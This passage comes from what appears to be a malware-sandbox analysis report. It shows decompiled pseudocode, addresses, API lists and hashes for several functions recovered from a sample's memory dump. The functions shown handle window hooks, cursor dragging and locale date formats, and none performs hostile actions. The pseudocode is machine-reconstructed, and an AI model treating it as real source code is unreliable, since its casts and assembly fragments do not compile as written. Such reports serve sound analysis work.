					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                    0x00458fbf
                                                    0x00458fc1
                                                    0x00458fc7
                                                    0x00458fc7
                                                    0x00458fce
                                                    0x00458fda
                                                    0x00458fdc
                                                    0x00458fe2
                                                    0x00458ff2
                                                    0x00458ff6
                                                    0x00458ffc
                                                    0x00458ffc
                                                    0x00459001
                                                    0x00459007
                                                    0x0045900e
                                                    0x00000000
                                                    0x0045900e
                                                    0x00459013

                                                    APIs
                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                    • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                    • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                    • String ID:
                                                    • API String ID: 2429646606-0
                                                    • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                    • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045B640 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E0045B640(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t270;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t279;
				intOrPtr* _t306;
				intOrPtr _t307;
				void* _t314;

				_t313 = _t314;
				_push(__ebx);
				_push(__esi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t270 =  *0x451298; // 0x45129c
				E004053AC( &_v100, _t270);
				_t250 =  &_v8;
				_push(_t314);
				_push(0x45b9c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t314 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E004517CC() == 0 || E00458E30(E00439828( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0045B3A8( *_t250);
					} else {
						E0045B1B0( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0045B3E0();
					_v84 = E004581F4();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0043A91C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t320 = _t306;
					if(_t306 == 0) {
						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
						_t279 =  *0x437498; // 0x4374e4
						_t166 = L00403D78(_t307, _t279);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t307 + 0x190);
							if( *(_t307 + 0x190) != 0) {
								ClientToScreen( *(_t307 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t306 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0043AAC0( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00458DF8( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E0043809C(_v148,  &_v140,  &_v144, _t320);
					E00404A58( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x49be64; // 0x437a1c
					_v96 = _t188;
					_v40 = 0;
					_v33 = E0043C130( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t285 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t327 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0045B534(_v96, _t285, _t313);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(L00403DE8( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
							_t238 = E0045B594(_v44, _t250, 0xffc8, _t313) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0043AA94( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0043B11C( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E00458F44(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0045B1B0( *_t250, 1, _v48);
						} else {
							E0045B1B0( *_t250, 0, _t231);
						}
						L26:
						_pop(_t271);
						 *[fs:eax] = _t271;
						_push(0x45b9cd);
						E004049E4( &_v148, 2);
						_t273 =  *0x451298; // 0x45129c
						return E0040547C( &_v100, _t273);
					}
				}
			}












































                                                    0x0045b641
                                                    0x0045b649
                                                    0x0045b64a
                                                    0x0045b64e
                                                    0x0045b654
                                                    0x0045b65f
                                                    0x0045b660
                                                    0x0045b661
                                                    0x0045b667
                                                    0x0045b66d
                                                    0x0045b672
                                                    0x0045b677
                                                    0x0045b678
                                                    0x0045b67d
                                                    0x0045b680
                                                    0x0045b685
                                                    0x0045b692
                                                    0x0045b97f
                                                    0x0045b97f
                                                    0x0045b982
                                                    0x0045b984
                                                    0x0045b995
                                                    0x0045b986
                                                    0x0045b98c
                                                    0x0045b98c
                                                    0x00000000
                                                    0x0045b6cb
                                                    0x0045b6d0
                                                    0x0045b6d6
                                                    0x0045b6dc
                                                    0x0045b6e4
                                                    0x0045b6f1
                                                    0x0045b6f9
                                                    0x0045b704
                                                    0x0045b70f
                                                    0x0045b710
                                                    0x0045b711
                                                    0x0045b712
                                                    0x0045b71d
                                                    0x0045b722
                                                    0x0045b727
                                                    0x0045b72f
                                                    0x0045b732
                                                    0x0045b734
                                                    0x0045b744
                                                    0x0045b749
                                                    0x0045b74f
                                                    0x0045b754
                                                    0x0045b756
                                                    0x0045b758
                                                    0x0045b75f
                                                    0x0045b76c
                                                    0x0045b76c
                                                    0x0045b75f
                                                    0x0045b736
                                                    0x0045b73d
                                                    0x0045b73d
                                                    0x0045b783
                                                    0x0045b796
                                                    0x0045b7a1
                                                    0x0045b7aa
                                                    0x0045b7b8
                                                    0x0045b7c9
                                                    0x0045b7d7
                                                    0x0045b7de
                                                    0x0045b7e6
                                                    0x0045b7e9
                                                    0x0045b7ee
                                                    0x0045b7f3
                                                    0x0045b80d
                                                    0x0045b815
                                                    0x0045b835
                                                    0x0045b835
                                                    0x0045b83f
                                                    0x0045b849
                                                    0x0045b84d
                                                    0x0045b84d
                                                    0x0045b84d
                                                    0x0045b84f
                                                    0x0045b851
                                                    0x0045b85a
                                                    0x00000000
                                                    0x0045b860
                                                    0x0045b860
                                                    0x0045b864
                                                    0x00000000
                                                    0x00000000
                                                    0x0045b86e
                                                    0x0045b886
                                                    0x0045b8a1
                                                    0x0045b8b3
                                                    0x0045b8cb
                                                    0x0045b8d7
                                                    0x0045b8da
                                                    0x0045b8dd
                                                    0x0045b8dd
                                                    0x0045b8ee
                                                    0x0045b8f3
                                                    0x0045b8fb
                                                    0x0045b904
                                                    0x0045b915
                                                    0x0045b91a
                                                    0x0045b922
                                                    0x0045b92b
                                                    0x0045b939
                                                    0x0045b952
                                                    0x0045b958
                                                    0x0045b95d
                                                    0x0045b962
                                                    0x0045b978
                                                    0x0045b964
                                                    0x0045b96a
                                                    0x0045b96a
                                                    0x0045b99a
                                                    0x0045b99c
                                                    0x0045b99f
                                                    0x0045b9a2
                                                    0x0045b9b2
                                                    0x0045b9ba
                                                    0x0045b9c5
                                                    0x0045b9c5
                                                    0x0045b85a

                                                    APIs
                                                      • Part of subcall function 004517CC: GetActiveWindow.USER32 ref: 004517CF
                                                      • Part of subcall function 004517CC: GetCurrentThreadId.KERNEL32 ref: 004517E4
                                                      • Part of subcall function 004517CC: EnumThreadWindows.USER32(00000000,004517AC), ref: 004517EA
                                                      • Part of subcall function 0045B3E0: GetCursor.USER32(?), ref: 0045B3FB
                                                      • Part of subcall function 0045B3E0: GetIconInfo.USER32(00000000,?), ref: 0045B401
                                                    • ClientToScreen.USER32(?,?), ref: 0045B76C
                                                    • OffsetRect.USER32(?,?,?), ref: 0045B783
                                                    • OffsetRect.USER32(?,?,?), ref: 0045B8B3
                                                      • Part of subcall function 0045B1B0: SetTimer.USER32 ref: 0045B1CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                    • String ID: tC
                                                    • API String ID: 2591747986-1085749316
                                                    • Opcode ID: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                    • Instruction ID: 5094cc74829a0d0ddc56b95c8e280c0bc637037c8d8d66aa697b62fbdea552c2
                                                    • Opcode Fuzzy Hash: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                    • Instruction Fuzzy Hash: 1FC1D675A006188FCB10EF68C485A9EB7F5FF49304F1440AAE905EB366DB34AD49CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CC9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404C80(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404C88(_t122, 0x40cec0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404BA8();
												E00404C88(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404C88(_t122, 0x40ceb4);
										_t92 = _t92 + 1;
									}
								} else {
									E00404C88(_t122, 0x40cea0);
									_t92 = _t92 + 3;
								}
							} else {
								E00404C88(_t122, 0x40ce8c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = L0040DD78(_t124, _t92);
							E00404EE0(_t124, _v8, _t92,  &_v20);
							E00404C88(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x49e748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A14(_t122, _t124);
					} else {
						while(_t92 <= E00404C80(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404BA8();
									E00404C88(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}























                                                    0x0040cc9c
                                                    0x0040cca1
                                                    0x0040cca2
                                                    0x0040cca3
                                                    0x0040cca4
                                                    0x0040cca5
                                                    0x0040cca9
                                                    0x0040ccab
                                                    0x0040ccaf
                                                    0x0040ccb0
                                                    0x0040ccb5
                                                    0x0040ccb8
                                                    0x0040ccbb
                                                    0x0040ccc2
                                                    0x0040ccda
                                                    0x0040ccf2
                                                    0x0040ce3c
                                                    0x0040ce3e
                                                    0x0040ce43
                                                    0x0040ce45
                                                    0x00000000
                                                    0x00000000
                                                    0x0040cd5b
                                                    0x0040cd60
                                                    0x0040cd67
                                                    0x0040cda5
                                                    0x0040cdaa
                                                    0x0040cdac
                                                    0x0040cdcb
                                                    0x0040cdd0
                                                    0x0040cdd2
                                                    0x0040cdf3
                                                    0x0040cdf8
                                                    0x0040cdfa
                                                    0x0040ce0f
                                                    0x0040ce0f
                                                    0x0040ce11
                                                    0x0040ce17
                                                    0x0040ce1e
                                                    0x0040ce13
                                                    0x0040ce13
                                                    0x0040ce15
                                                    0x0040ce2c
                                                    0x0040ce36
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040ce15
                                                    0x0040cdfc
                                                    0x0040ce03
                                                    0x0040ce08
                                                    0x0040ce08
                                                    0x0040cdd4
                                                    0x0040cddb
                                                    0x0040cde0
                                                    0x0040cde0
                                                    0x0040cdae
                                                    0x0040cdb5
                                                    0x0040cdba
                                                    0x0040cdba
                                                    0x0040ce3b
                                                    0x0040ce3b
                                                    0x0040cd69
                                                    0x0040cd72
                                                    0x0040cd80
                                                    0x0040cd8a
                                                    0x0040cd8f
                                                    0x0040cd8f
                                                    0x0040cd67
                                                    0x0040ccf8
                                                    0x0040ccf8
                                                    0x0040ccfd
                                                    0x0040cd00
                                                    0x0040cd0e
                                                    0x0040cd0a
                                                    0x0040cd0a
                                                    0x0040cd0a
                                                    0x0040cd12
                                                    0x0040cd4d
                                                    0x0040cd14
                                                    0x0040cd39
                                                    0x0040cd1a
                                                    0x0040cd1a
                                                    0x0040cd1c
                                                    0x0040cd1e
                                                    0x0040cd20
                                                    0x0040cd29
                                                    0x0040cd33
                                                    0x0040cd33
                                                    0x0040cd20
                                                    0x0040cd38
                                                    0x0040cd38
                                                    0x0040cd38
                                                    0x0040cd44
                                                    0x0040cd12
                                                    0x0040ce4b
                                                    0x0040ce4d
                                                    0x0040ce50
                                                    0x0040ce53
                                                    0x0040ce65

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                    • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004392CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x49eb34 = __eax;
				_push(_t133);
				_push(0x439471);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x49eb3c = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					L00403DE8(__eax, __eflags);
					__eflags =  *0x49eb34;
					if( *0x49eb34 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00438690(1, _t124);
							 *0x49eb3c = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x437498; // 0x4374e4
						_t54 = L00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E004197DC(0,  &_v36, 0, _t124, _t129);
								E0043AA94(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x437498; // 0x4374e4
							_t71 = L00403D78(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E00441704(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043915C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				L00403DE8(__eax, _t135);
				if( *0x49eb34 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00438578(_t124, 1);
						 *0x49eb3c = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}




























                                                    0x004392cc
                                                    0x004392d5
                                                    0x004392d8
                                                    0x004392da
                                                    0x004392dc
                                                    0x004392e4
                                                    0x004392e5
                                                    0x004392ea
                                                    0x004392ed
                                                    0x004392f2
                                                    0x004392f5
                                                    0x004392fc
                                                    0x00439303
                                                    0x00439359
                                                    0x0043935e
                                                    0x00439365
                                                    0x00439374
                                                    0x00439378
                                                    0x00439388
                                                    0x0043938b
                                                    0x0043938b
                                                    0x00439395
                                                    0x0043939a
                                                    0x004393a0
                                                    0x004393a5
                                                    0x004393a7
                                                    0x004393c5
                                                    0x004393c8
                                                    0x004393cc
                                                    0x004393f9
                                                    0x004393fe
                                                    0x00439400
                                                    0x0043940d
                                                    0x00439412
                                                    0x00439418
                                                    0x0043941e
                                                    0x00439421
                                                    0x00439421
                                                    0x0043942a
                                                    0x00439433
                                                    0x00439439
                                                    0x0043943e
                                                    0x00439444
                                                    0x0043944a
                                                    0x00000000
                                                    0x0043944a
                                                    0x004393d0
                                                    0x004393d6
                                                    0x004393db
                                                    0x004393dd
                                                    0x00000000
                                                    0x00000000
                                                    0x004393e3
                                                    0x004393e8
                                                    0x004393ee
                                                    0x004393f4
                                                    0x00000000
                                                    0x004393a9
                                                    0x004393b8
                                                    0x0043944d
                                                    0x00439456
                                                    0x00439457
                                                    0x00439458
                                                    0x00439459
                                                    0x0043945a
                                                    0x00439462
                                                    0x00439469
                                                    0x0043946c
                                                    0x00000000
                                                    0x0043946c
                                                    0x004393a7
                                                    0x00439369
                                                    0x0043936c
                                                    0x00000000
                                                    0x0043936c
                                                    0x0043930e
                                                    0x0043931a
                                                    0x00439329
                                                    0x0043932d
                                                    0x00439341
                                                    0x00439344
                                                    0x00439344
                                                    0x00000000
                                                    0x0043932d
                                                    0x0043931e
                                                    0x00439321
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \`C$tC
                                                    • API String ID: 0-3452953066
                                                    • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                    • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x49eb38 = __eax;
				_t24 =  *0x49eb38; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x49eb44);
				_t26 =  *0x49eb38; // 0x0
				_t58 = 0x49eb44->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x49eb48; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x49eb4c = GetCursor();
				_t28 =  *0x49eb38; // 0x0
				 *0x49eb40 = E00438388(_t28);
				 *0x49eb50 = _t70;
				_t60 =  *0x4360a0; // 0x4360ec
				if(L00403D78(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x49eb38; // 0x0
				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x49eb58;
